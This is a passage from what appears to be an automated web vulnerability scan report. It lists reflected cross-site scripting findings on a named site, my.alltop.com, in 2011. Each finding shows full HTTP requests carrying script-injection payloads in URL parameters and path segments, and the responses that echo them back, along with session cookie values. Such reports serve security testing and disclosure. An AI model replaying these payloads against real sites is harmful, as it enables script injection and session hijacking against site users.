Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a71875"><script>alert(1)</script>7227e96d4de" method="post" accept-charset="utf-8">
...[SNIP]...

1.29. http://my.alltop.com/alpha/a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5daa7"><script>alert(1)</script>14790842cfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?5daa7"><script>alert(1)</script>14790842cfc=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a?5daa7"><script>alert(1)</script>14790842cfc=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.30. http://my.alltop.com/alpha/a [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acba7"><script>alert(1)</script>6398c96cf08 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000C1)%3C/script%3Eacba7"><script>alert(1)</script>6398c96cf08 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:26 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:28 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:28 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000C1)%3C/script%3Eacba7"><script>alert(1)</script>6398c96cf08" method="post" accept-charset="utf-8">
...[SNIP]...

1.31. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2022f"><script>alert(1)</script>92138bbe86c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C2022f"><script>alert(1)</script>92138bbe86c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C2022f"><script>alert(1)</script>92138bbe86c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.32. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26c01"><script>alert(1)</script>5a0a4519285 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C26c01"><script>alert(1)</script>5a0a4519285/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C26c01"><script>alert(1)</script>5a0a4519285/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.33. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fba"><script>alert(1)</script>8caff67b2a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3Cc1fba"><script>alert(1)</script>8caff67b2a2/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3Cc1fba"><script>alert(1)</script>8caff67b2a2/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.34. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b57fa"><script>alert(1)</script>abd846000b9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3Eb57fa"><script>alert(1)</script>abd846000b9 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3Eb57fa"><script>alert(1)</script>abd846000b9" method="post" accept-charset="utf-8">
...[SNIP]...

1.35. http://my.alltop.com/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41627"><script>alert(1)</script>5b40a6159cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E?41627"><script>alert(1)</script>5b40a6159cf=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000114)%3C/script%3E?41627"><script>alert(1)</script>5b40a6159cf=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.36. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%22ns=%22netsparker(0x00011B)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be629"><script>alert(1)</script>f2ad206645 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/abe629"><script>alert(1)</script>f2ad206645/%22ns=%22netsparker(0x00011B) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
